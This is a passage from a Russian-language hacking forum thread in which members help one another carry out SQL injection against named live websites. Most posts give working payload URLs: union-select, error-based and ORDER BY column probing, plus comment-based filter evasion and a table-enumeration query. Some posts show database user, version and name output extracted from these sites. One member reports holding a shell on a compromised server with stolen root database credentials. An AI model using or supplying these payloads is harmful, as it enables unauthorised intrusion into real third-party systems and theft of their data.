Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    а у тебя случяйно не blind injection??
     
  2. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    есть - union+select+1,2,3,4,group_concat(table_name)+from+information_schema.tables+where+table_schema='имя database()'
    но вывести можго только 1024 символа
     
  3. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    В общем так, есть сайт, и при site.com/lol.php?id=1' выдаётся ошибка mysql_fetch_object(), и кавычка экранируется как \' ...
    а при /**/order/**/by/**/9999-- и т.п еррора нету, думал что запрос обрамлён в кавычки, но видимо не так, так как другим раскрутить удалось, собственно, какие идеи?
    P.S Error-based тоже юзал..
     
  4. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    юзай mid() :)
    а вообще LIMIT бы не мешало сначала
     
  5. TYPUCT

    TYPUCT New Member

    Joined:
    7 Sep 2010
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Есть идеи как нибудь раскрутить это?
     
  6. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    106
    Likes Received:
    26
    Reputations:
    5
    нет через обычный union вывожу.

    c⧱uКч"‡Bњn
    dс\ ґЃJК.я-йј
    ЛXЫ l[Ж RЂNяїџъ
    ХzWt 9:fЗРЭh.G
    JyM·B>ґ< с–ЗА

    эти кракозябры (все по 16 симв) хеши - уверен на 100%
    но вот какие. Может это 32 символьный md5 просто некоректно выводиться ?
    Кстати тип поля - text.
    Помогите разобраться, я в полном тупике. У кого есть какие идеи пишите.
     
  7. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    http://www.datingtop.net/index.php?id=10+and(select+count(*)+from+information_schema.tables+group+by(concat(version(),0x00,floor(rand(0)*2))))--+
    Code:
    Duplicate entry '5.0.92-community' for key 1
     
    1 person likes this.
  8. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    ты руками выводиш или прогой??
     
  9. sl1k

    sl1k Member

    Joined:
    31 Jul 2009
    Messages:
    106
    Likes Received:
    26
    Reputations:
    5
    и руками и прогой
     
  10. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    select concat(@i:=0,@a:=0x3a,benchmark(666,@a:=concat(@a,0x3a,(select @i:=table_name from information_schema.tables where table_name>@i limit 1))),@a)
    где 666 - кол-во строк не более максимального значения в таблице.
     
  11. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    может лучше почитать мануал?
    там все популярно расписано...
     
  12. anonym_di

    anonym_di Member

    Joined:
    21 Jan 2012
    Messages:
    55
    Likes Received:
    7
    Reputations:
    0
    Всем Хай, вот есть сайт
    http://www.lingvoinfo.com/?link=-115/*+union+select+,1,2,3,4*/ => при таком запросе у меня почему-то выводит число 0 как можно провести SQLi ???
     
  13. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    http://www.lingvoinfo.com/?link=115+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,version(),19,20,21,22,23,24,25,26+--+ вот так нужно
     
  14. anonym_di

    anonym_di Member

    Joined:
    21 Jan 2012
    Messages:
    55
    Likes Received:
    7
    Reputations:
    0
    как ты узнал кол-во табл??
     
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Смотри, там у тебя два запроса.
    http://www.lingvoinfo.com/?link=115+ORDER+by+25 false+true
    http://www.lingvoinfo.com/?link=115+ORDER+by+27 false+false
    http://www.lingvoinfo.com/?link=115+ORDER+by+26 false+true
    Соответственно, кол-во = 26.
     
    2 people like this.
  16. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    амне показалось фильтрация идет :mad:

    http://www.lingvoinfo.com/?link=115/**/order/**/by/**/26+--+ true
    http://www.lingvoinfo.com/?link=115/**/order/**/by/**/27+--+ false
     
    1 person likes this.
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Помогите со скулёй, чёт никак не выходит
     
    1 person likes this.
  18. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Code:
    http://www.porsche-spb.ru/model.phtml?id=9999999+union+select+1,2,3,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,5,6,7--+
    porsche_main@localhost:porsche_main:5.5.19
    Вроде все стандартно...
     
    2 people like this.
  19. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    граждане, вопрос такой, есть шелл, нашол root конфиг бд пароль и логин, коннектился root-ом к базе пару недель назад все гуд, а сейчас пишет Access denied for user 'root'@'localhost' (using password: YES), думал пароль сменили, проверил - нет, таже связка логина и пароля, вопрос - в чем прикол??
    p.s. если конекчюсь не рутом, все норм, коннект происходит
     
  20. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопрос, подобрал колонки
    но при попытке вывода инфы вылитает ошибка, как быть?
     
Thread Status:
Not open for further replies.